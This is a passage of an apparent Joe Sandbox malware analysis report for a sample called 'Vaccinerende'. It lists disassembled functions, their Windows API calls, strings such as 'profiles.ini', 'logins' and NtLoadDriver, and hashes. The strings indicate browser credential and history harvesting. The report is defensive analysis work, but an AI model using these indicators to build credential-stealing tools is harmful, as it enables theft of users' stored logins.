                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                            • wcscpy.MSVCRT ref: 004041D6
                                            • wcscpy.MSVCRT ref: 004041E7
                                            • memset.MSVCRT ref: 00404200
                                            • memset.MSVCRT ref: 00404215
                                            • _snwprintf.MSVCRT ref: 0040422F
                                            • wcscpy.MSVCRT ref: 00404242
                                            • memset.MSVCRT ref: 0040426E
                                            • memset.MSVCRT ref: 004042CD
                                            • memset.MSVCRT ref: 004042E2
                                            • _snwprintf.MSVCRT ref: 004042FE
                                            • wcscpy.MSVCRT ref: 00404311
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                            • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                            • API String ID: 2454223109-1580313836
                                            • Opcode ID: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                            • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                            • Opcode Fuzzy Hash: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                            • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                            Function 00411346 Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 263windowregistryclipboardCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                            • SetMenu.USER32(?,00000000), ref: 00411453
                                            • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                            • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                            • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                            • memcpy.MSVCRT(?,?,00002008,?,00000000,/nosaveload,00000000,00000001), ref: 004115C8
                                            • ShowWindow.USER32(?,?), ref: 004115FE
                                            • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                            • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                            • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                            • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                            • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                              • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                              • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                            • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                            • API String ID: 4054529287-3175352466
                                            • Opcode ID: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                            • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                            • Opcode Fuzzy Hash: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                            • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                            Function 00414F1E Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: wcscat$_snwprintfmemset$wcscpy
                                            • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                            • API String ID: 3143752011-1996832678
                                            • Opcode ID: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
                                            • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                            • Opcode Fuzzy Hash: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
                                            • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                            Function 0041352F Relevance: 31.5, APIs: 9, Strings: 9, Instructions: 41libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                            • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                            • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                            • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                            • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                            • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                            • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                            • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                            • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: AddressProc$HandleModule
                                            • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                            • API String ID: 667068680-2887671607
                                            • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                            • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                            • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                            • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                            Function 0040FB5D Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: _snwprintfmemset$wcscpy$wcscat
                                            • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                            • API String ID: 1607361635-601624466
                                            • Opcode ID: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                                            • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                            • Opcode Fuzzy Hash: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                                            • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                            Function 0041019A Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: _snwprintf$memset$wcscpy
                                            • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                            • API String ID: 2000436516-3842416460
                                            • Opcode ID: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                            • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                            • Opcode Fuzzy Hash: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                            • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                            Function 004035AD Relevance: 27.1, APIs: 18, Instructions: 93windowCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                              • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                              • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                              • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                              • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                              • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                              • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                              • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                              • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                              • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                              • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                            • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                            • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                            • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                            • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                            • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                            • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                            • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                            • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                            • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                            • String ID:
                                            • API String ID: 1043902810-0
                                            • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                            • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                            • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                            • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                            Function 0040E2AB Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                              • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                            • free.MSVCRT ref: 0040E49A
                                              • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                            • memset.MSVCRT ref: 0040E380
                                              • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                              • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                            • wcschr.MSVCRT ref: 0040E3B8
                                            • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,74DF2EE0), ref: 0040E3EC
                                            • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,74DF2EE0), ref: 0040E407
                                            • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,74DF2EE0), ref: 0040E422
                                            • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,74DF2EE0), ref: 0040E43D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                            • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                            • API String ID: 3849927982-2252543386
                                            • Opcode ID: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                            • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                            • Opcode Fuzzy Hash: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                            • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                            Function 004447D9 Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 139COMMON
                                            Download Yara Rule
                                            APIs
                                            • ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                            • _snwprintf.MSVCRT ref: 0044488A
                                            • wcscpy.MSVCRT ref: 004448B4
                                            • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ??2@??3@_snwprintfwcscpy
                                            • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                            • API String ID: 2899246560-1542517562
                                            • Opcode ID: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                                            • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                            • Opcode Fuzzy Hash: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                                            • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                            Function 0040DBA7 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 95COMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.MSVCRT ref: 0040DBCD
                                            • memset.MSVCRT ref: 0040DBE9
                                              • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                              • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                              • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                              • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                            • wcscpy.MSVCRT ref: 0040DC2D
                                            • wcscpy.MSVCRT ref: 0040DC3C
                                            • wcscpy.MSVCRT ref: 0040DC4C
                                            • EnumResourceNamesW.KERNEL32(0040DD4B,00000004,0040D957,00000000), ref: 0040DCB1
                                            • EnumResourceNamesW.KERNEL32(0040DD4B,00000005,0040D957,00000000), ref: 0040DCBB
                                            • wcscpy.MSVCRT ref: 0040DCC3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                            • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                            • API String ID: 3330709923-517860148
                                            • Opcode ID: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                            • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                            • Opcode Fuzzy Hash: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                            • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                            Function 00407FDF Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 228COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                              • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                              • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                            • memset.MSVCRT ref: 0040806A
                                            • memset.MSVCRT ref: 0040807F
                                            • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                            • _wcsicmp.MSVCRT ref: 004081C3
                                            • memset.MSVCRT ref: 004081E4
                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                              • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                              • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                              • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                              • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                              • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                              • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                              • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                              • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                              • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                              • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                            • String ID: logins$null
                                            • API String ID: 2148543256-2163367763
                                            • Opcode ID: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                                            • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                            • Opcode Fuzzy Hash: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                                            • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                            Function 00408560 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 182stringCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                            • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                            • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                            • memset.MSVCRT ref: 004085CF
                                            • memset.MSVCRT ref: 004085F1
                                            • memset.MSVCRT ref: 00408606
                                            • strcmp.MSVCRT ref: 00408645
                                            • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                            • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                            • memset.MSVCRT ref: 0040870E
                                            • strcmp.MSVCRT ref: 0040876B
                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                            • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                            • String ID: ---
                                            • API String ID: 3437578500-2854292027
                                            • Opcode ID: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                            • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                            • Opcode Fuzzy Hash: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                            • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                            Function 0041083A Relevance: 21.1, APIs: 14, Instructions: 137windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.MSVCRT ref: 0041087D
                                            • memset.MSVCRT ref: 00410892
                                            • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                            • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                            • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                            • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                            • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                            • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                            • GetSysColor.USER32(0000000F), ref: 00410999
                                            • DeleteObject.GDI32(?), ref: 004109D0
                                            • DeleteObject.GDI32(?), ref: 004109D6
